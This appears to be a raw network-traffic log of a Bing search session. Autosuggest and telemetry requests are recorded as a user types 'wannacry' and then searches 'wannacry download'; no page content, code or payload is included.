GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wanna&cp=5&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.cc7e2c4b2380eb36e4d622ea8769e012&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.91cd78945a6ebdb7cff5924bcab3c8b6&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.9d2e98f3e4389f11d1683aac3aeb9d03&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.80089752fde30d719a2040c42d106e78&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.f44b5cc5f3a798fb2272f017831fef31&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.e616e429f6447765ffdccedc36ee8fb4&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.52037a59c29fb07bc8966c1ea7d62d5a&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.fc102480767bb1d4bc5344737823965b&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.fc102480767bb1d4bc5344737823965b&w=120&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awann%2Ci%3A21%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199051424%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awann%2Ci%3A20%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199051448%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A22%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199051558%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199051580%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awan%2Ci%3A19%22%2C%22AsResponseLength%22%3A%222069%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199051603%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A19%2Cig%3ADE0261137A35471B8F3706E7BE84C393%22%2C%22AnswerInfo%22%3A%22LS%3B3%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199051604%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awann%2Ci%3A20%22%2C%22AsResponseLength%22%3A%22938%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199051613%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A20%2Cig%3A707E9494E2DC461686D487926254DBED%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199051613%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%22%2C%22AsResponseLength%22%3A%22923%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199051686%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%2Cig%3A624394393F064E96A0FF01D96179E1E0%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199051687%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannac&cp=6&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199051693%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A5%2C%20%5C%22GL%5C%22%3A2%2C%20%5C%22IG%5C%22%3A%5C%22624394393F064E96A0FF01D96179E1E0%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199051693%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A23%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199052806%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199052827%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%22%2C%22AsResponseLength%22%3A%22742%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199053029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%2Cig%3A15CD7EC87E3945C8B1FBF205FD171BE8%22%2C%22AnswerInfo%22%3A%22LS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199053029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199053032%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A6%2C%20%5C%22GL%5C%22%3A2%2C%20%5C%22IG%5C%22%3A%5C%2215CD7EC87E3945C8B1FBF205FD171BE8%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199053032%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannacr&cp=7&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannacry&cp=8&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A24%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199053924%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A7%2C%20%5C%22GL%5C%22%3A1%2C%20%5C%22IG%5C%22%3A%5C%2215CD7EC87E3945C8B1FBF205FD171BE8%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199053924%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A23%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199053944%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A23%22%2C%22AsResponseLength%22%3A%22733%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199054029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A23%2Cig%3AB131CF12E4AC449E81FA43FBEF327938%22%2C%22AnswerInfo%22%3A%22LS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199054029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A25%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199054140%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A24%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199054162%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A24%22%2C%22AsResponseLength%22%3A%22728%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199054236%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A24%2Cig%3AC4590B6108BF47FE86E6B63DA7CD3064%22%2C%22AnswerInfo%22%3A%22LS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199054237%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannacry%20&cp=9&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A26%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199054475%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199054498%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%22%2C%22AsResponseLength%22%3A%22734%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199054580%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%2Cig%3AF2060D51DCE5445385C918F99F2EF2FE%22%2C%22AnswerInfo%22%3A%22MB%3B26%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199054580%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199054582%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A9%2C%20%5C%22GL%5C%22%3A17%2C%20%5C%22IG%5C%22%3A%5C%22F2060D51DCE5445385C918F99F2EF2FE%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199054582%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

GET https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0&ajaxnorecss=1&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&format=snrjson&jsoncbid=0&ajaxsydconv=1

HTTP Request

GET https://www.bing.com/fd/ls/GLinkPing.aspx?IG=F2060D51DCE5445385C918F99F2EF2FE&ID=autosuggest,5007.1&PR={%22i%22:%22m%22,%22ghc%22:1,%22et%22:2378}

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awannacry%20download%2Ci%3A27%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199056958%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

204

HTTP Response

204

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:5,%22BC%22:381,%22SE%22:-1,%22TC%22:-1,%22H%22:457,%22BP%22:629,%22CT%22:629,%22IL%22:11},%22ad%22:[-1,-1,1263,601,1263,4729,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

200

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199057722%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%229.35%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1729199057722%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1729199057738%2C%22Name%22%3A28851%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057738%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057740%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057744%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199057762%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057762%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057763%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057763%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057765%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057765%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1729199057765%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057767%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057767%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22Time%22%3A29551%2C%22time%22%3A29556%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1729199058154%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=D607FEFA2831486BA34E9C5873B1B63C&iid=.5098&ptn=Web&ep=0&iconpl=1

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A29556%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199058154%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A29557%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199058155%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum10%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f10%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058158%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22SuppressingFeature%22%3A%22lgVidAns%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1729199058339%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22lgVidAns%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1729199058371%2C%22Name%22%3A%222%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&clientsid=undefined

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.PPT&DATA={%22S%22:693,%22E%22:1367,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1729199058438%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22717.000000004191%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1729199058439%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221922.000000020489%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1729199058439%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058534%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057746%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057747%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057757%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

